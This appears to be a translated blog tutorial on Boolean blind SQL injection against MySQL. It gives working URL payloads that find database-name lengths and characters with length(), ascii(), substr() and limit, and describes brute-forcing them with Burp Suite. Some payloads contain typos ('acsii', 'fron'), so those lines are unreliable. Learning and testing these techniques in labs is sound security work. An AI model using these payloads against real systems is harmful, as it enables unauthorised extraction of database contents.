Complete analysis of Boolean blind injection of SQL injection

Injection principle

Boolean blind annotation is applicable when there is no echo during injection. The principle is that the application system makes Boolean judgment when querying according to the where+and statement, that is, the result is true or false, for example, select * from admin where id=1 and 1=1. In general, the application system only accepts the ID variable value to splice the sql statement for query, However, small partners who have used union joint query know that they can close sql statements to let the application system execute the statements we want, so in this case, we can judge the database content (database name, table name, column name, field value, etc.) by constructing statements so that the query result is true or false

Actual combat utilization

Function interpretation

length()					//Return string length
substr(a,b,c)				//c characters are intercepted from bit b in string a
ascii()						//Convert characters to ascii code one by one 	 There are 128 ascii codes in total
left(a,b)					//Intercept the front b bit from the left
regexp '^ro'				//Regular expression, this sentence indicates that the first two digits are ro; Same as like 'ro%'
ORD()						//Returns the ascii code of the first character of a string
MID(a,b,c)				    //As with substr(), c characters are intercepted from bit b in string a


Primary use (length + ascii + substr)

1. Attempt to close

?id=1' --+

2. Structural poc
(1) Judge database length

?id=1' and length((select database()))=7   //Abnormal display

?id=1' and length((select database()))=8	//If the display is normal, it means that the current database length is 8

(2) Get database name

?id=1' and ascii(substr((select database()),1,1))=1 --+    //It can be shot here

Note: the blasting type and blasting parameters here

The first parameter representation of blasting substr The first bit is the field of the query result, which is the field of the current database
 The second parameter of the burst represents the number of characters intercepted by the first parameter ascii Code, ascii 128 yards in total

If the length of the current database is determined in the first step, here payload 1 1 to 8

the second payload then is ascii Code, from 1 to 128[ Start attack]

As shown in the figure above, the ascii code 4 of the current database name has been exploded. The next step is to convert it. Here is a recommended website that can convert ascii codes in batch[]

The current database name has been obtained. For others, you only need to modify the query statement in the first parameter of substr function

Advanced use (length + ascii + substr + limit)

In the above primary use, you need to use the limit function when querying multiple rows of parameters. The following also shows how to query other table names or library names like joint query. We can directly construct poc

1. Judge the length of all databases

?id=1' and length((select schema_name from information_schema.schemata))=1 --+
You can see that when you use this statement, an error message is displayed saying that more than one line of information is returned

 There are actually two methods that can be used here
 Method 1: group_concat()The queried information is summarized into one line, which is automatically used by the system,Separate
 Method 2: use limit Function to specify the row information to query (recommended for personal comparison)

When the query returns the first line of information, we add an after the query statement limit 0,1
 Similarly, when a query returns the second line of information, it is added after the query statement limit 1,1

Still use Burpsuite Blasting module to blasting

We don't know how many databases the target system has or how many bits the database is longest. I use 20 by default
20 There are already quite a few databases, and it is not common for database names to be as long as 20 strings
 therefore payload1 and payload2 Both are set to 1 to 20, with an interval of 1[ Start Attack]

The results come out. Through the blasting results, we can see that there are five databases in mysql of the system! [insert picture description here](,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5bib6KiA,size_20,color_FFFFFF,t_70,g_se,x_16

2. Query all database names

?id=1' and acsii(substr((select schema_name fron information_schema.schemata limit 0,1),1,1))=1 --+
When blasting, we can directly set three parameters, but the blasting data screening is very chaotic
 So we still choose to explode two data

payload1(Current database (longest field):
		The length of the first database is from 1 to 10
		The second database is from 1 to 5 in length
		The third database is from 1 to 18 in length
		The fourth database is from 1 to 8 in length
		The fifth database is from 1 to 3 in length
payload2(ascii Code): interval 1 from 1 to 128

The ascii code of the first database has been obtained. Next, I won't say how to convert the ascii code into characters

If we want to explode the name of the second database, we only need to modify two places
First place: limit 1,1
The second place: the payload1 burst value is changed from 1 to the second database length

Further, the list name field values of the explosion table are all in this way, but there are no more examples


Boolean blind annotation is applicable when the query data cannot be echoed normally. If the length, ascii and substr functions are disabled, the left, ORD and MID functions can be used. Boolean blind annotation may take more time and must avoid errors in the construction of poc statements.

Tags: Web Development Database SQL Cyber Security penetration test

Posted on Sat, 06 Nov 2021 00:49:00 -0400 by slak